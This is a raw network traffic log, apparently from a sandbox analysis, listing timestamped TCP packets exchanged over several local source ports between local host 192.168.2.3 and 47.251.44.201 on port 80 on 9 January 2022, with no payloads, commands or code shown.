Jan 9, 2022 18:47:55.325525045 CET	80	49793	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:55.325761080 CET	49793	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:55.325921059 CET	49793	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:55.325973988 CET	49793	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:55.503946066 CET	80	49793	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:55.888828039 CET	80	49793	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:55.888914108 CET	80	49793	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:55.889038086 CET	49793	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:55.889319897 CET	49793	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:55.930995941 CET	49797	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.067672968 CET	80	49793	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:56.111731052 CET	80	49797	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:56.111987114 CET	49797	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.112133026 CET	49797	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.112198114 CET	49797	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.292639017 CET	80	49797	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:56.691019058 CET	80	49797	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:56.691134930 CET	49797	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.691296101 CET	49797	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.718800068 CET	49799	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.872004032 CET	80	49797	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:56.892721891 CET	80	49799	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:56.892848015 CET	49799	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.892962933 CET	49799	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:56.893003941 CET	49799	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:57.066806078 CET	80	49799	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:57.066853046 CET	80	49799	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:57.446978092 CET	80	49799	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:57.447030067 CET	80	49799	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:57.447196007 CET	49799	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:57.454133034 CET	49799	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:57.628031015 CET	80	49799	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:57.817449093 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:57.989741087 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:57.989852905 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:57.990020990 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.203249931 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529261112 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529324055 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529364109 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529403925 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529417992 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.529443026 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529484987 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529509068 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.529525995 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529548883 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.529566050 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529607058 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529645920 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.529665947 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.529709101 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.701750994 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.709975004 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710025072 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710067034 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710104942 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710140944 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710144043 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710184097 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710222006 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710227013 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710263014 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710280895 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710302114 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710335016 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710350990 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710390091 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710397005 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710427999 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710467100 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710477114 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710508108 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710551977 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710591078 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710589886 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710630894 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710663080 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710673094 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710712910 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.710716963 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.710786104 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.882843971 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.882910013 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.882946014 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.883093119 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.890733004 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.890778065 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.890816927 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.890856981 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.890857935 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.890892029 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.890897036 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.890938044 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.890976906 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891011953 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891016960 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891040087 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891056061 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891099930 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891109943 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891139030 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891179085 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891217947 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891239882 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891256094 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891280890 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891295910 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891335011 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891375065 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891392946 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891426086 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891454935 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891463041 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891504049 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891541958 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891558886 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891581059 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891602039 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891619921 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891659975 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891699076 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891716957 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891738892 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891756058 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891777992 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891818047 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891856909 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891872883 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891894102 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891915083 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.891932964 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.891971111 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.892009974 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.892025948 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.892050982 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.892070055 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.892088890 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.892128944 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.892168999 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:58.892184973 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:58.892225981 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.055361032 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.055428028 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.055468082 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.055507898 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.055526972 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.055584908 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.064169884 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.064229012 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.064264059 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.064294100 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.072406054 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072449923 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072487116 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072520971 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.072554111 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.072721958 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072763920 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072803020 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072822094 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.072840929 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072911978 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072952032 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.072968960 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.072990894 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073010921 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073031902 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073071003 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073110104 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073127031 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073148966 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073165894 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073198080 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073237896 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073277950 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073295116 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073318958 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073342085 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073358059 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073399067 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073435068 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073453903 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073474884 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073491096 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073514938 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073554039 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073592901 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073607922 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073631048 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073652029 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073669910 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073709011 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073745012 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073765993 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073784113 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073812008 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073822021 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073863029 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073901892 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073929071 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073940039 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.073956966 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.073981047 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.074018955 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.074055910 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.074074984 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.074095964 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.074115992 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.074135065 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.074172974 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.074212074 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.074234009 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.074249029 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.074270964 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.122973919 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.227694035 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.227752924 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.227791071 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.227830887 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.227833033 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.227896929 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.236450911 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.236514091 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.236583948 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.244518995 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.244560003 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.244633913 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.246860027 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.246901989 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.246942043 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.246982098 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247020960 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247052908 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247059107 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247083902 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247097015 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247127056 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247138977 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247181892 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247195959 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247220039 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247260094 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247277975 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247298956 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247337103 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247354031 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247375965 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247416973 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247431993 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247457981 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247498989 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247515917 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247536898 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247575998 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247596025 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247615099 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247652054 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247673035 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247689962 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247729063 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247750998 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247767925 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247807980 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247827053 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247844934 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247884035 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247903109 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.247924089 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.247962952 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248002052 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.248012066 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248054028 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248070002 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.248095989 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248136044 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248176098 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248184919 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.248217106 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248240948 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.248255968 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248291016 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.248327017 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.253211021 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.253251076 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.253293991 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.253422976 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.253454924 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.253489017 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.294898987 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.295164108 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.341756105 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.400031090 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.400094986 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.400134087 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.400155067 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.400175095 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.400233984 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.408828020 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.408926964 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.408992052 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.416685104 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.416742086 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.416809082 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420211077 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420250893 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420290947 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420330048 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420331001 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420372009 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420399904 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420422077 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420461893 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420492887 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420500994 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420543909 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420564890 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420583010 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420619965 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420639038 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420659065 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420698881 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420713902 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420739889 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420780897 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420794964 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420819044 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420874119 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.420892954 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420933008 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420972109 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.420988083 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.421009064 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421047926 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421063900 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.421087027 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421123981 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421139002 CET	49800	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:47:59.421164036 CET	80	49800	47.251.44.201	192.168.2.3
Jan 9, 2022 18:47:59.421204090 CET	80	49800	47.251.44.201	192.168.2.3
